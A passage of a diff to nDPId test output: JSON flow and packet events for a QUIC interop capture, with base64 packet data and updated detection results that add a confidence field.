lUO3sEi\/jyMwMDaEUvpg=="}
-00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434507,"flow_last_seen":1603816434507,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434507,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":38077,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"nghttp2.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434507,"flow_last_seen":1603816434507,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434507,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":38077,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"nghttp2.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434507,"flow_last_seen":1603816434507,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434507,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":37643,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02139{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1603816434507,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434507,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUA0WRAAEARMO3AqAGAR8opqZMLAbsE7E3SzgoKCgoINqH1Vk80LhQAAETSZtRDhHpK7xsUlJpSgtMoVla6Pas+BpVtN5Gjcd3BxSuPRtpK\/YBMJ9l2k8o2HThiUM\/fvgYuD2Kcrxorh\/jnb6Z8yLwnCqMFI6f5++2wq3UD\/j8Rm4jH0vTA53TCV8faPBmIbc\/\/f3Tz+R2DOXZgP62iVOiBptLL3IqVZOU4IOLE0\/JVkynYUJQnG0YsW4UK0qnbcWTyRdgTGBkMmMCcy0t6nX6Tgq0WiglTiACb2fNGAUM5xWmIp7l56ox3rxd5eSC\/ouvINjM5kG8P8v2tSujZgl86FeLWEME+DY5WH6KcXkEbr69+FbbuNXvDK2f590+AqasG+fI7zBfNWo1Ipsj7l1HkYvsUvIcw26BBQurqx8+tF7QthbMubN0aD8OhoOBolJfSbDzAs85Id6ivSBG9R0jYEyc3k1vljfz+fMsTaJHmT507adZ2GD7mZXjlqTo2tY0lxTmDq8TYIRmW5S0g5AxeLYESawu5tcDeQ1F0ZZz\/81pFA\/O6Xsz+LW+nkuPcxb3FhZQ8rGk11Nxnt5bl3qx9dkKg50nnHBStrKL99IkvRWEio2XD6zIDHeUPmuj6vbPMoqWbJ1BWc1QOP8zvT\/5Lum0urlm+3xs84QGqHVu2D75cOuwNNgNZCk5Ju4VXwD1CjjYHIrh0EPYz\/YpjMoCs1JdYRQApUEYvXPrOftFHyRWo2ChQb33MFXFQcv8wO2\/5aJKqYdcVeht\/\/qNdSsRFnrxK6h2aWdAQ4Z7JbsFvA\/hTb+VL5L9GCSqVojyjcvz6pXj+7VmERo1L+Pa9BRifjy0iLNfjP5wofltooS4BlzdCB4aUHHGlTH+J7RtfENSes5C1MkGk3bXd4a77aCZrF2RKt65BuGoTHxCIa46j\/b1GLm8VZzlNV59q4blAc5XL98HTRWrj7Lyc79Dh8jXnEXwPmDWmW9CsA4Ch4D72guVA+3h1lyEU8sU8aFmgHNkr\/q70G96HCmPexSIjjNAelbGlp4sZrLx47ftxlllSk4gO\/H46nyfjKhEcW56k2uyhm8V4HNNWN4MpbIc\/Yfvdrngx7qWGlmiM3iNJAh16I3SuDM9QVUwv5ATd2ADCULw+erv80Ft9CMpIikvknhfJ1tVT8peEKIqu9ABaR5GMoofySzXczjefzyNV1DG6SeWJ52+UthtjpveV9nHmvLuYXnvGea6FWcjL6o6DFccw\/MPYc1ZnxJKIVJl7s7PzYYTQJo6uzu7RffuRaN3XTJ5SsTndQcokexpIO49TaPuPvP71185NglDXOKS+OmNgUpybmlmuhSa5FYUv3bbW69PHc\/kF0xzXBLf5+J+46p3Nttr2OqPoeJohEZHRVI\/6AiZJhhgwvTHdeaUhk2xf9gKSkmNoHccjkKGyBBA6zyzqAsmTBzP1bnAJvuFd4p4mvR9AAMpTZsVCt4+YpaevXhHBN80S0SJnJ8GYSPTlTDk5S5LCl8ACcrSmYkJfN2QxrZnjAo\/7X0BI4v65EBgE0aBU2rS5E3V+L7+ROQByi56sXJjXQwyagtcG5I2ud7++g9fSmh383\/sJtnw8\/3hGH5RGGOTtYIFZs7aGYDtNUkdsTHzAAG0WjFBvyjkoOpP88ObPBQn3FH06fbbow+5Nw0s\/GK8dgRoDVdGM2xounw=="}
-00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434507,"flow_last_seen":1603816434507,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434507,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":37643,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"71.202.41.169","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434507,"flow_last_seen":1603816434507,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434507,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":37643,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"71.202.41.169","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00638{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434507,"flow_last_seen":1603816434507,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434507,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":37876,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02140{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1603816434507,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434507,"pkt":"pJGxgjQ5PKn0qB\/sht1gChbjBNgRQCABCwcKydWupNP+R2kegH0qBdAYDOmBAM0q4v2zvsWrk\/QBuwTYWzDMCgoKCgiUaZcozIAAbQAARL5emZhgck3iuC3JUSB8iNm2XjGzLpnCsBWAY4Ojdy\/\/5MzHp06LTPIVKnl9FZGbcpBpkxyhd1DLZI+eYqtiEG5aKS74esaWBq8RL8\/CjhVxYArCrDSr+0hp9B1y+nWDHqDWr7MDZcNsju+tb0UHpoKlBgrUvyDGQhAsZRf7r39yd2xxEzbvuwQuuQ3ed9XQC5ng8bRhq403ZCE\/MYrs6MMmD1D8+1P9lcgzES1uneCIpx1HJrBTKP7nMlE81Z1P78Gu9qUmPawKzam5r0zOt6L0vp6aYOWsVv\/E0pz5vx1omUeD8AvBUEEvL\/DEN6PQFWuaU56poUyWE4zmT1fCmpfkQl2t9VM5S0DSjV9+bnc9oeMC84JGWazOmN+3mpmXoZcYRh07YBY2MZ4VnmznfQ80K1ED3kKFM39nycCSACELzlTXDOkJ\/ktY0JyGo358ZvTutgq61KEs8NzcRLv8hDrgsQWV4XjOrAL105eXrA5f784uvCuN2fslFwCeDS0drYeuYLl2X3IPLV7kaNRc+OWAxuENUrLcJjOCAml9vIubSnbhMgY8q\/R\/4iocbJeAZaxcxLWoaBL5Dy6c5RqwmcmQUw2FcUSfarB7m6DGemQRBI6m8IfxS6ULrn9t0ZaJXLuVmX9Bm2oeGECfAf31JRuwVJ9fv26n\/XDb55k0fcO\/t2QAqH5VfQ\/XE6N19TPKrMa5fdi51foR6Wyl8S6hOCeKDO2C9D5n0K\/H4Ph5+pkEEtQs72MottYSPihw0iY\/Fu1RfLXjTA4gqlduvFyO1c3LDQtaJKHg0vklnpsW\/ahvB9sqw1bthHTeyy2PAYGFyd5\/vPsWwu1prQnziZfvuZBv4r85RGoHlFs8OJLDxJP5Unl+UHM1ip66ezVc52fyagwU2p\/dNxSLNLq9ZZZxOqPXoRe4DIj2O5EE+tg2DBKVlqsKlvnpY2O8nYNOUYb06eUwLY7eUmyF5kAFPXCNi2RVkA+F1RffYC4TGxAF6olxMiRrcrs3c\/DtIuA3v9xxQcuNbfPZJrt6p2lhDsnJl0cXW7yahBQ3t8Vob3Fxn8maWSGCm5H4l+b5QiCXjD6aPLMIVSGOxlZuOuMShDlqCqLDm2rrFG\/Ex+58dfI4GZg27KkFrt8yKQU5xP3cDpmgWO8cz42odj5\/XN7ZJEwitO8kjLFt+mYDrVsscfg2UJe74+Xm4LAVvyTj\/b5G5HD1FrTlV0Rk9tUeirRMew509ZVXjW6YJYWL6zO9lgxLgoaV8Gd+v8yh8ZKPFv9a4RV\/5RBt4U2FAY94eskZ2SwKXWETml5yVCj4zuhjsEmm1HcHzPbvj3x0zXEiI2GG4l\/vpR4uTmkPxSOziP4F5ZFOBoaoWk92Q4T6koGjbXJnLz8U3PiyS0Qz4nAzJ2kSKRwz7zoxMiMJyM86M7+1Qefwixc4jngX8nk9EZniCllUXuWjwKpDQHahASkxBg+qPeRKYIoZbqfouV14QIMHyAa5JM7alvljGBrRgRAZXmcDpn2gAJImko\/gdF0i\/5wYy3K4UZeND0xxE7m532JLVgzS2+HslCBkUca8fdagWqHn+Gho8KaUeJhRfYw0ZgBrosRDMSIh0QMCIiGRjGE5z\/aohA=="}
-00879{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434507,"flow_last_seen":1603816434507,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434507,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":37876,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.aiortc.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434507,"flow_last_seen":1603816434507,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434507,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":37876,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.aiortc.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00638{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434509,"flow_last_seen":1603816434509,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434509,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":34442,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02129{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1603816434509,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434509,"pkt":"pJGxgjQ5PKn0qB\/sht1gAK6QBNgRQCABCwcKydWupNP+R2kegH0gAUgAeBcBAb52Tv\/+BGMdhooBuwTYZF3MCgoKCgiLyuadTBhpMAAARL5Jn8vg\/A\/iHcc5HGyjUHtzYCYh3M+1HzdHtSjFxotnADrnTs2cVW9HALnbbxq+j13Bpa3hTOGyFKAuVKKOVbHcGaJLdNA06DSFzV66GiVnWQJ+1MFEeQ+EHU1tYSy5DynacUlvf1G20dd2kmKE70+xxOTQI+IxdCf39TGHKu+pGUdVYYzStvwWo5npAklpjTRW1hPHPgr+vxfK0tzntAB4tgdSsfnM003avASiWDb+GIQGRqQqd12Z3S73M6xSxbEpPhQs03GVV7j7jPCY+xuSqdE0+RC2M2xTxkDxrKzwifOo5JzioGQ8n1leAaytkPPh7\/6kP3tXKc3zSh+6mDapIcrXvGRPBtxzjcwZlnfC61xJLZ4o\/bDf7VXUn2iqev2r7RfntxDJ4F+CHoqdQU19Agb1DRLZ+44sSsLJRZPe0rMYqmphZb9TR\/CXfZoxmWSMgVmNHVqPhkUDRkBFiFUg2qWtzD6IUIlCi4UB90+3QDAMKbHPStmRV90FoZ4qgb1QWQshIsAOJrfADpMoeQeOvpHnWSBMA4n5tbORKddl3SJHwqDMa\/kYlEza3HmYzKyIekgCLUxBLZMgtxwl0pUeJvIYxMdZF6Znn7pRsQ+GhZyet6ZCOM2ft7uJCMRH5bphpdavcWHTrSt8uZ2iyfo3VofxaZqdzUsHHTpc9bD205szhfCxENgNATF1PGuWlfKJUrPPjUWPpw65iGFR3+hPQ1+ZRRE7orDx2vkC5kOJiEvbv0d6sp6yfMo3tuOn4kXULD2rf5TSc8aqDVZCklaUIbEuKaQv0jni\/XkpmdOw2UlUp3oYLZ9on+kdq43Nf9WrEJ+gfSZPMUZsyhXXyPRNGMrTBo0SUX31QcOdzW7AQaAXnJRZob+0gus27voTqIEPJh01fxeGPbXNNQ7VzwarPIKHRq1lGIs\/wJwJCsm2hQjq0+K3VFq4cXacrOp5mbdbbDJRXEnCejUnTswq7Ga3dz818NNmVp7FoznVEcHX3RQBfk8eLveHtTEpxIgmvWuj5aaZt+HyxH\/0YALf+wz6lv1s1l\/hg9o2e11OlebH1k7T7awcxgi41AZepwsE50V3GVh5GwIfK89lz9Ro6tly3hUhrsJ2ja1C+A6RBrWVVdcIlZY4BlIcSzf0BUccadkfpP\/Enz0yFkuHTLXTyrmsvl44wgxOvsJrZMwFacqnccJZHwZHWEMkNcxcPbL0Z2U7a3Xa12dEVYYVu1U+X65oQyb2yPkBqMJ+DTB9RU+DnZIynnRzCZZkuvH7Uzn\/zVoVu3fNULVHSP4L+ehdOiOmS0l9r6IzvZQbe+xLjtz2iXbuU36zKNhA17n0gtw0JDOpoFDbD0FwhdY1JUMZx18mcrbFQX02CO02e+BE1Anxc\/TfBIKj2hI2ObT4d57WIvq7cpwJxNdZMuBfjVhAX64+5X4J\/pGNdD3WMTo1fYU74kzII9sWnijVE1WzVIBymOIxdGDOuxbCm5vJaE\/oIJEfaWcfmDwa+jhxCRN2aqJvKC+Iwq2cNN7z7vgOXAZ9SIrdZFgVX8+v9NO3ca9aZtmZoK1IAWW54LXRx4BZnrJKuFoltIkcOXZOYajcaVAMSefQYGNrVyxL8AzXWJ9vEQ=="}
-00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434509,"flow_last_seen":1603816434509,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434509,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":34442,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.ogre.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434509,"flow_last_seen":1603816434509,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434509,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":34442,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.ogre.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434512,"flow_last_seen":1603816434512,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434512,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":47010,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1603816434512,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434512,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAtF1AAEARybfAqAGAA3nyNreiAbsE7OwqxgoKCgoIdQnXg0rBLY8AAETSdSNeqCjc+r6H8HOL2nfX9Nl4bt2\/tch\/k3WGu45v6swQRKEZjB5cL5PwQRNSezjETWlwl9x31DElYvPiaTjwEzV3uzPoPSD3RDsDoNIOdJfzM8eeT+YF8HtZxPxl8JfMcAWEYacVzCIRBiKkRKZDpR5dR0ouRtlV3GGe7kt0DtTyh+sL3vELhV2kHz6ly30R\/jiT47NHUtkHKuInrvyxjGqVvAYH34n7tXCBQ6D+AfZH11fptBBQ7utMKjJQetgZnmiyn4jfUks45DQLptmzmM7vacgVM1UXfvDRMiXWFLlgc2aMseReas3HNr0PU1Ye1gi1puLSN2a9gpcRb+O0YMFs0jlKm38N1LBqGTBpyiDu8QECyVyUyl5oER0iWXuG3TbvkN2QQTnAKlJqm0eLVl\/NYu3z\/fNWg32CWUDT2152nd1+esKzcxvEOyGhXuUWhYZ2f900yvrQLHcBQy2bY\/c28n\/CX4U8pxI6NyIasmjHd4xMKoES4DMmjTKarxqquM7dXQbXZLB8En20kKfdQRYHHg+reqWqS2rb8XL4IMSIg8+UsaueMDmzrfUZd\/56R7cXjRlq+VUmt81q5nNnKCMBQ\/7rvr4qOGOZ2CHm9V+uADTNbhvve0l68irgd7nnxQpElTgIyjHyFhvd8KPoLd2HsWPDEewjah\/d5eFL2o2JGexda6drG5JkIeHDe6OWKoobO2FfYrFha9u0nzvL0Czf21A7G+Hktz+GtzDop6GmMw9wX0x7PAWZ9MWVDxJhZqMOzlDofB1A88ZWDukm1Hm6PVA8JMNdUp3UJt5LtDBJLLAEOUN0BNEg9pXHjjKOVZeJN8ZQvkURagzOCo3aTho10tRkW\/\/buLsCCgS9oRh18BVjsveR+UkY4XmNAimeDQhBeVIZNQAbv63kh8fikt2GCen13aqn\/akV6vyA3xP9zH8BrXE0pnxbTdVJRyKZmPMfH+2L5gdn4Inm\/u2BD5yUOdsZkjyDYog2dorLJX+t+PSQ9uXuCwdbDKjjZw9L8++g9YMCmG+DuNoxchSfm4TcUkVs0SgbA\/r\/65YZBCmO6TdtJWtU8H5XFhYFiz1Q78xobCBsvaSvzLLye5aeCDzi6qFTLk0yIv3EAu91rP\/6ul6HmTBVTtG3x8oOLW5WVDEqHHQcQF2G5KsSqr4MhwRqiW0iF9\/6ruIt5OM0L8g5QVUhLrV+wAUx9TrMv+LPDrsvG+Dx5k4p3UodhKDHRb\/7ijQM2ozG8RHNrTry6RrGZAsgdT3BTj1sf\/spjmdgzIF2pwahJa8xi9tbBXrUI1dyXG3+uu21VtbunHyZrZPu9Lqmex5yNEoIMYh8ALvFMBlRu18WIDIANDkgo6akaO98LoftutjwPgqclkRUkaNJO1Z4mpP+D3JcJ7AwJfHttUsGFLMXeHC0rS3Jx8xlGehlDG8Gjx6MbqsW4FVSy5EnAw4UdsWYMoAQZhCtB79ozmulqNFitQkW9QOF9WX6McnEdk8YyUFeo+qc1Fhx\/ki2cnpObQM3wblVzck3qttvXup8w\/1\/pw0ra8kGRFKBe8QDkHMzVAmkeyW7Mq2NBPRoMSnnA3XB4x1u8DQAzActQ0v3Mr5WeVLSgCf9kg2BakZtD12MZbxnzu5AN97akX7cpg=="}
-00830{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434512,"flow_last_seen":1603816434512,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434512,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":47010,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"ietf.akaquic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+00868{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434512,"flow_last_seen":1603816434512,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434512,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":47010,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"ietf.akaquic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00637{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434518,"flow_last_seen":1603816434518,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434518,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":48707,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02132{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1603816434518,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434518,"pkt":"pJGxgjQ5PKn0qB\/sht1gAXvJBNgRQCABCwcKydWupNP+R2kegH0qAKwAQAAEAALgTP\/+aBmdvkMBuwTYCBnBCgoKCgiEPL7zH8M0IgAARL6eKfaWNoqFUZMIorsrR+PI0mjVI6LMaQTDmquE5419Uqg0GPvALnuSvRL73ivCKJwok1RPqjtpoqHTz45vYlbMW0kHssfjLAjOAUVEArsuhMOirtE412w2RU3RQOLAwrvAO4t8cjd0tkO3FdpXC1+6xCs\/9xwo3urZvY7tv+pPD0m9iy\/nLknxJjrg3PYY9NvAu4T1Yktb5QjJpDpv3IzaFim4vDdRfhCCfZLoy9vkSpiUxLSsp\/4K4guLZKTInOo7dc7L0u0RBuQrBPDDqK4FVSYOh3qSMuIrLfcW45Du9zFvbaiFI1Z3W2Zo1htxNdAgXrRsYiaF2UOsu3EWo22nmt3QVCTvxN40wXQBY474YpdLOSzJ8YT2z1lcFu0wBMnv5wKXxH924c65Vd8jn5+Ysdu9cokS2TeRsJwGH6f8UJWWqASwvtTblbNaAA1rpPkaZ6SKb5\/2SCA8NKsLTMfd9lX